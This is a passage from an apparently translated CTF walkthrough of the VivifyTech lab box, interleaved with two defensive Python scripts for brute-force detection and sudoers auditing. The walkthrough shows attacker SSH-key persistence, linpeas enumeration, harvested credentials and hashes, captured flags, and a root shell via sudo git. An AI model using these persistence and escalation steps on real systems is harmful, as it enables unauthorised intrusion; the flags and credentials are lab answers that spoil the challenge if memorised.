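        if not fails or max_in_window([e[0] for e in fails], window_s) < threshold:
            continue
        last_fail = fails[-1][0]
        # A successful login from the same source after the burst means a guessed
        # credential probably worked: escalate, don't just block the IP.
        success_after = any(e[1] == "Accepted" and e[0] >= last_fail for e in evs)
        findings[ip] = {
            "failures": len(fails),
            "users": sorted({e[2] for e in fails}),
            "success_after": success_after,
        }
    return findings


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```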

    user.txt is in the home directory

    HMV{Y0u_G07_Th15_0ne_6543}

    Privilege escalation

    First, push the attack box's SSH public key up to keep access

    ssh-keygen
    cd .ssh
    echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK5sWbMpzoFOhxwVIjKUYvvMce5kR6XSmnTp7u2TlCmW kali@kali" >> authorized_keys
    

    Upload linpeas_fat.sh to scout around

    ❯ scp ./lin_fat.sh sarah@192.168.56.119:/tmp/
    lin_fat.sh                                                  100%   25MB  50.8MB/s   00:00
    

    It turns up database credentials in the WordPress config file

    And that's a dead end: the hash doesn't crack.

    mysql> select * from wp_users;
    +----+------------+------------------------------------+---------------+--------------------+----------------------------------+---------------------+---------------------+-------------+--------------+
    | ID | user_login | user_pass                          | user_nicename | user_email         | user_url                         | user_registered     | user_activation_key | user_status | display_name |
    +----+------------+------------------------------------+---------------+--------------------+----------------------------------+---------------------+---------------------+-------------+--------------+
    |  1 | sancelisso | $P$BPhGmUp9fmz6VHYL1FOPr33qtX.yyf1 | sancelisso    | test@localhost.com | http://192.168.177.133/wordpress | 2023-12-05 20:50:42 |                     |           0 | sancelisso   |
    +----+------------+------------------------------------+---------------+--------------------+----------------------------------+---------------------+---------------------+-------------+--------------+
    

    Going back to the home directory for another look, one of the hidden entries is not a default folder

    Inside is a file Tasks.txt

    sarah@VivifyTech:~/.private$ cat Tasks.txt
    - Change the Design and architecture of the website
    - Plan for an audit, it seems like our website is vulnerable
    - Remind the team we need to schedule a party before going to holidays
    - Give this cred to the new intern for some tasks assigned to him - gbodja:4Tch055ouy370N
    

    That gives the credentials gbodja:4Tch055ouy370N

    Privilege escalation via sudo -l

    After logging in as the new user, start with sudo -l, which shows permission to run git

    gbodja@VivifyTech:/home/sarah/.private$ sudo -l
    Matching Defaults entries for gbodja on VivifyTech:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !admin_flag, use_pty
    
    User gbodja may run the following commands on VivifyTech:
        (ALL) NOPASSWD: /usr/bin/git
    
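A rule like the one above is exactly what a sudoers audit should catch: a NOPASSWD entry for a binary that GTFOBins documents as able to spawn a shell. The checker below is an added example, not part of the original writeup; the sample input is a constructed copy of the sudo -l output with one benign rule added, and the escape-capable binary set is a small hand-picked subset that a real audit would extend from the GTFOBins data.

```python
"""Audit `sudo -l` output for NOPASSWD rules on binaries with documented shell escapes."""
import re

# Hand-picked subset of GTFOBins "sudo" entries (assumption: extend from the real
# GTFOBins data before relying on this list in an audit).
SHELL_ESCAPE_BINARIES = {
    "git", "vim", "vi", "less", "more", "man", "find", "awk",
    "python3", "perl", "env", "bash", "sh", "tar",
}

# Constructed copy of the sudo -l output from the writeup, plus one benign rule.
SAMPLE_SUDO_L = r"""Matching Defaults entries for gbodja on VivifyTech:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !admin_flag, use_pty

User gbodja may run the following commands on VivifyTech:
    (ALL) NOPASSWD: /usr/bin/git
    (root) /usr/bin/systemctl restart apache2
"""

# "(runas) TAG: TAG: cmd1, cmd2" -- tags such as NOPASSWD or SETENV are optional.
RULE_RE = re.compile(
    r"^\s+\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$"
)


def parse_sudo_rules(output):
    """Parse the command section of `sudo -l` into one dict per command."""
    rules, in_cmds = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_cmds = True  # everything before this is Defaults noise
            continue
        if not in_cmds:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            rules.append({
                "runas": m["runas"].strip(),
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd,
            })
    return rules


def risky_rules(output):
    """Return rules that grant unrestricted sudo or a shell-escape-capable binary."""
    flagged = []
    for rule in parse_sudo_rules(output):
        cmd = rule["command"]
        if cmd == "ALL":
            flagged.append({**rule, "reason": "unrestricted command set"})
            continue
        # Compare on the basename of the first token so arguments don't hide it.
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPE_BINARIES:
            flagged.append({**rule, "reason": f"{binary} has a documented shell escape"})
    return flagged


if __name__ == "__main__":
    for rule in risky_rules(SAMPLE_SUDO_L):
        print(rule)
```

Pair the result with a "least privilege" fix: replace the bare binary with a wrapper script that runs only the intended subcommand, and drop NOPASSWD unless automation truly needs it.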

    GTFOBins describes in detail all the ways to get a shell from git

    I chose option b here. First run sudo /usr/bin/git help config, then type !/bin/bash to get a root shell

    HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}

    Done

  • Original post: https://blog.csdn.net/tanbinn/article/details/139743603